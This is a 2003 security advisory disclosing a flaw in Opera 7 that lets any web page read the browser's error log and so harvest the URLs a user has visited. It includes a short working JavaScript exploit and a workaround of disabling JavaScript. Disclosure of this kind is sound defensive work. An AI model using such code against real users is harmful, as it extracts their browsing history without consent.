GreyMagic Security Advisory GM#006-OP

By GreyMagic Software, Israel.
04 Feb 2003.

Topic: Sniffing Opera's Tracks.

Discovery date: 29 Jan 2003.

Affected applications:

Opera 7 (final).

Introduction:

Opera recently released a new version of its browser.

The new browser features a very useful Javascript console, which uses a few methods Opera implemented in the "opera" object.

Discussion:

These methods appear in the comments of the "console.html" file as follows:

opera.errorIndex()
Returns the index of the last error message. This index is monotonically increasing (which limits us to about 2^53 errors per Opera session).
opera.errorMessage(i)
Returns the error message at index i. The value returned may be #f, if that message has been flushed from the cache.

Opera hadn't bothered to restrict these methods to certain credentials and they are available for any web page to use. At first glance this doesn't appear to be a big deal, but a short inspection of the generated error messages reveals that each of them contains the URL that threw the exception.

In practice, this means that a web page can extract a list of all URLs the user had visited and that threw any exceptions. And since Opera pretends to be Internet Explorer by default, it often encounters errors in web pages. Harvesting visited URLs had never been this simple.

Exploit:

The following code will generate a list of visited URLs:

var sMsg,
    sFinal="",
    iLen=opera.errorIndex();

for (var iErr=0;iErr<iLen;iErr++) {
    sMsg=opera.errorMessage(iErr);
    if (sMsg && /(https?:\/\/\S+)/i.test(sMsg)) sFinal+=RegExp.$1+"\n";
}
alert(sFinal);

Demonstration:

Pressing the button below should display a list of unique URLs, which were collected by iterating through the error messages. Make sure you browse around for a bit before hitting it in order to collect a few URLs.

Solution:

Until a patch becomes available, disable Javascript by going to: File -> Preferences -> Multimedia, and uncheck the "Enable JavaScript" item.

Tested on:

Opera 7 NT4.
Opera 7 Win98.
Opera 7 Win2000.
Opera 7 WinXP.

Disclaimer:

The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.

Vulnerability details are provided strictly for educational and defensive purposes.

GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Stay informed:

Subscribe to GreyMagic's early notification email service and be informed of new vulnerabilities and updates as soon as they appear on the site.

Press here to subscribe.

Your privacy is important to us, read our Privacy Statement.